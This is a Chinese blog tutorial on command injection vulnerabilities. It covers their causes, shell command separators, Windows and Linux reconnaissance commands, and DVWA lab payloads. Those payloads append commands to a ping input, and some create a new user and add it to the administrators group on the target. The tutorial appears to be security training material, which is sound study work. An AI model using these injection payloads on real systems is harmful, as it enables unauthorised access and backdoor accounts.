命令执行漏洞

命令执行漏洞

命令执行产生原因

  • 命令执行漏洞

  • 命令执行漏洞是指应用有时需要调用一些执行系统命令的函数,如:system()、exec()、shell-exec()、eval()、passthru(),代码未对用户可控参数做过滤,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击。

  • windows:ping命令,默认抓取4个数据包

  • 分类

  • 1.代码层过滤不严 商业应用的一些核心代码封装在二进制文件中,在web应用中通过system函数来调用: system(“/bin/program --arg $arg”);
    ##非利用扫描工具过滤
    ##搭建网站后,有index.php文件
    2.系统的漏洞造成命令注入 bash破壳漏洞(CVE-2014-6271)
    ##bash,linux中的终端
    3.调用的第三方组件存在代码执行漏洞 WordPress中用来处理图片的ImageMagick组件; JAVA中的命令执行漏洞(strus2/ElasticsearchGroovy等); ThinkPHP命令执行;
    ##0 day 厂商不知道有这个漏洞
    ##电脑中有的组件会发生问题

利用条件:
1.应用调用执行命令的函数
2.将用户输入作为系统命令的参数拼接到命令中
3.没有对用户输入过滤或者过滤不严格

windows常见连接符
A;B 先执行A,再执行B
A&B 简单拼接,A B之间无制约关系
A | B 显示B的执行结果
A&&B A执行成功,然后才会执行B
A | | B A执行失败,然后才会执行B

Windows环境下:
dir
##查看当前路径目录

在这里插入图片描述

dir;cd phpStudy
##简单拼接
##查看到phpStudy路径中的文件

在这里插入图片描述

ipconfig
##查看ip

在这里插入图片描述

whoami
##查看当前用户

在这里插入图片描述

ipconfig&whoami
ipconfig&&whoami
##&&有限制,有约束
##&&前面命令错误后面不执行
##&无约束,单个错误不影响另一个

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

ipconfig|whoami
##显示B的执行结果
ipconfig||whoami
##A执行失败,然后才会执行B

在这里插入图片描述

arp -a
##查看两个缓存表
##ARP(中间人攻击)
##A欺骗B是C,C欺骗B是A
##ARP欺骗 欺骗的是IP地址
##判断:打开路由表,如果有相同的IP,其中一个是源头
##断网,杀毒,重装系统

在这里插入图片描述

calc
##计算器

在这里插入图片描述

regedit
##注册表

在这里插入图片描述

netstat -ano
##查看当前操作系统中开放的端口及服务

在这里插入图片描述

Linux系统:
ifconfig
##查看IP
##根据IP访问对应页面

在这里插入图片描述

cat /etc/password
##/etc/password文件存放了账户和密码
##账户、密码、名称、家目录等
ls
##查看目录文件
ls -l
##查看权限
##当前文件所属用户的权限
##可读,可写,可执行

在这里插入图片描述

ls -l /etc/shadow
##当前所有用户可读,只有管理员可写
ls -l /etc/password
##只有当前组可看,其余组看不了

在这里插入图片描述

id
##gid=0管理员组默认0
groups
##查看当前组
cat /etc/group
##当前操作系统所有用户、所有组

在这里插入图片描述

/bin/sh
##进入终端
##$普通用户,#管理员
whoami
##我是谁
pwd
##我在哪儿
uname -a
##查看对方的版本,你是谁

在这里插入图片描述

kill 59295
##杀死进程,根据端口号
netstat -pantu
netstat -nr
##查看网关

在这里插入图片描述

dvwa:
127.0.0.1&whoami
##简单拼接

127.0.0.1&ipconfig
##简单拼接

127.0.0.1&calc
##简单拼接
##在对方服务器上打开一个计算器

127.0.0.1&regedit
##在对方服务器打开一个注册表
127.0.0.1& netstat -ano
##显示端口及服务
127.0.0.1& net user
##查看当前操作系统的用户
127.0.0.1& net user c c /add
##创建一个新用户,并且密码是c,添加
127.0.0.1& net local group administrators c /add
##创建一个管理员组内的用户

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

系统漏洞: 远程终端交互+IP
##远程监听,获取数据包
##远程登录主机

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值